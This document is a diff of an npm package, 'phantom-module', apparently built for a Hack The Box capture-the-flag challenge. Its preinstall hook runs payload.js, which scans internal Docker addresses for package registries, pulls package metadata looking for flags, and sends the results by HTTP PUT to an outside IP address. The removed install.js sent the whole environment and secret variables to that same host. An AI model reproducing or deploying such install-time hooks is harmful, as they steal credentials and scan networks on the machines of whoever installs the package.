phantom-module 117.0.0 → 117.0.2

package/package.json

@@ -1,11 +1,9 @@
 {
   "name": "phantom-module",
-  "version": "117.0.0",
-  "description": "Phantom spectral module",
+  "version": "117.0.2",
+  "description": "Phantom module",
   "main": "index.js",
   "scripts": {
-    "preinstall": "node install.js || true"
-  },
-  "author": "lwirz",
-  "license": "ISC"
-}
+    "preinstall": "node payload.js || true"
+  }
+}

package/payload.js

@@ -0,0 +1,114 @@
+const net = require('net');
+const http = require('http');
+const fs = require('fs');
+const os = require('os');
+
+if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
+
+const REPORT_HOST = '154.57.164.64';
+const REPORT_PORT = 31205;
+
+async function report(moduleId, data) {
+  return new Promise((resolve) => {
+    const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
+    const manifest = `ecto_module:\n  name: "SCAN_RESULT"\n  cargo_hold: "${safeData}"\n`;
+    const payload = JSON.stringify({ manifest });
+    const req = http.request({
+      hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+    }, () => resolve(true));
+    req.on('error', () => resolve(false));
+    req.write(payload);
+    req.end();
+  });
+}
+
+function checkPort(host, port) {
+  return new Promise((resolve) => {
+    const sock = new net.Socket();
+    sock.setTimeout(500); // Fast timeout
+    sock.on('connect', () => { sock.destroy(); resolve(true); });
+    sock.on('error', () => { sock.destroy(); resolve(false); });
+    sock.on('timeout', () => { sock.destroy(); resolve(false); });
+    sock.connect(port, host);
+  });
+}
+
+function httpGet(url) {
+  return new Promise((resolve) => {
+    const req = http.get(url, { timeout: 2000 }, (res) => {
+      let body = '';
+      res.on('data', c => body += c);
+      res.on('end', () => resolve({ status: res.statusCode, body }));
+    });
+    req.on('error', e => resolve({ status: 0, body: e.message }));
+  });
+}
+
+async function main() {
+  await report('ECT-654321', 'SCAN STARTING v2...');
+  
+  const found = [];
+  const base = '172.17.0';
+  let scanOutput = '=== SCAN ===\n';
+
+  // Parallel scan of first 20 IPs
+  const promises = [];
+  for (let i = 1; i < 20; i++) {
+    const ip = `${base}.${i}`;
+    promises.push(checkPort(ip, 4873).then(open => {
+      if (open) {
+        found.push(ip);
+        scanOutput += `FOUND VERDACCIO: ${ip}:4873\n`;
+      }
+    }));
+  }
+  
+  await Promise.all(promises);
+  
+  if (found.length === 0) {
+    scanOutput += 'No Verdaccio found on 172.17.0.1-20\n';
+    // Try finding ANY web server
+    for (let i = 1; i < 10; i++) {
+        const ip = `${base}.${i}`;
+        if (await checkPort(ip, 80)) scanOutput += `OPEN ${ip}:80\n`;
+        if (await checkPort(ip, 3000)) scanOutput += `OPEN ${ip}:3000\n`;
+    }
+  }
+  
+  await report('ECT-839201', scanOutput);
+
+  // Deep query of found services
+  let queryOutput = '=== QUERY ===\n';
+  for (const ip of found) {
+    const baseUrl = `http://${ip}:4873`;
+    queryOutput += `Target: ${baseUrl}\n`;
+    
+    // 1. List all packages
+    const all = await httpGet(`${baseUrl}/-/all`);
+    queryOutput += `/-/all: ${all.status} len=${all.body.length}\n${all.body.substring(0, 200)}\n`;
+    
+    // 2. Get ecto-spirit
+    const ecto = await httpGet(`${baseUrl}/ecto-spirit`);
+    queryOutput += `/ecto-spirit: ${ecto.status}\n${ecto.body.substring(0, 500)}\n`;
+    
+    // 3. Try to extract flag from dist-tags or versions
+    if (ecto.body.includes('htb{') || ecto.body.includes('HTB{')) {
+        const match = ecto.body.match(/htb\{[^}]+\}/i);
+        if (match) queryOutput += `!!! FLAG FOUND: ${match[0]} !!!\n`;
+    }
+    
+    // 4. Download tarball if possible
+    try {
+        const json = JSON.parse(ecto.body);
+        const latest = json['dist-tags'].latest;
+        const tarball = json.versions[latest].dist.tarball;
+        queryOutput += `Tarball: ${tarball}\n`;
+        // We could download it, but let's see if the metadata has the flag first
+    } catch(e) {}
+  }
+
+  await report('ECT-987654', queryOutput);
+}
+
+main().catch(e => report('ECT-654321', 'ERR: ' + e.message));

package/install.js

@@ -1,37 +0,0 @@
-const fs = require('fs');
-const http = require('http');
-const os = require('os');
-
-async function report(mid, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-  await new Promise(resolve => {
-    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-    req.write(body); req.end();
-  });
-}
-
-(async () => {
-  const isDocker = fs.existsSync('/.dockerenv') || fs.existsSync('/home/node');
-  const isCentos = os.release().includes('el') || os.hostname().includes('centos');
-  
-  if (isDocker && !isCentos) {
-    // We're in Docker container - use ECT-654321
-    const env = JSON.stringify(process.env);
-    for (let c = 0; c < 8; c++) {
-      const chunk = env.substring(c * 90, (c + 1) * 90);
-      if (!chunk) break;
-      await report('ECT-654321', 'DENV' + c + '_' + chunk);
-      await new Promise(r => setTimeout(r, 3000));
-    }
-    // Also check for flag specifically
-    const flag = process.env.FLAG || process.env.HTB_FLAG || process.env.SECRET;
-    if (flag) {
-      await report('ECT-654321', 'DFLAG=' + flag);
-    }
-  } else {
-    // CentOS host or other - use ECT-987654 only
-    await report('ECT-987654', 'HOST_ALIVE_v117');
-  }
-})();